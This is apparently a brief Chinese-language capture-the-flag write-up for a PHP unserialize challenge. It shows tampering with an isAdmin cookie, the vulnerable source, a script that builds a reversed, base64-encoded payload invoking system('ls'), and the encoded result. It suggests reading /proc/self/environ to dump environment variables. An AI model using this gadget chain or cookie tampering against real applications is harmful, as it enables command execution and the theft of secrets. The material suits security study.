打开是空页面
抓包发现cookies有东西
O:4:"User":1:{s:7:"isAdmin";b:0;}
将零改为1,放包得到题目页面
<?php
error_reporting(0);
include('utils.php');
class A {
public $className;
public $funcName;
public $args;
public function __destruct() {
$class = new $this->className;
$funcName = $this->funcName;
$class->$funcName($this->args);
}
}
class B {
public function __call($func, $arg) {
$func($arg[0]);
}
}
if(checkUser()) {
highlight_file(__FILE__);
$payload = strrev(base64_decode($_POST['payload']));
unserialize($payload);
}
编写payload
<?php
class A {
public $className;
public $funcName;
public $args;
}
class B {
public function __call($func, $arg) {
$func($arg[0]);
}
}
$a = new A();
$a->className = 'B';
$a->funcName = 'system';
$a->args = 'ls';
echo $payload = urlencode(base64_encode(strrev(serialize($a))));
?>
结果
fTsic2wiOjI6czsic2dyYSI6NDpzOyJtZXRzeXMiOjY6czsiZW1hTmNudWYiOjg6czsiQiI6MTpzOyJlbWFOc3NhbGMiOjk6c3s6MzoiQSI6MTpP__call方法
strrev方法
反转字符
ls改成cat /proc/self/environ或者env即可
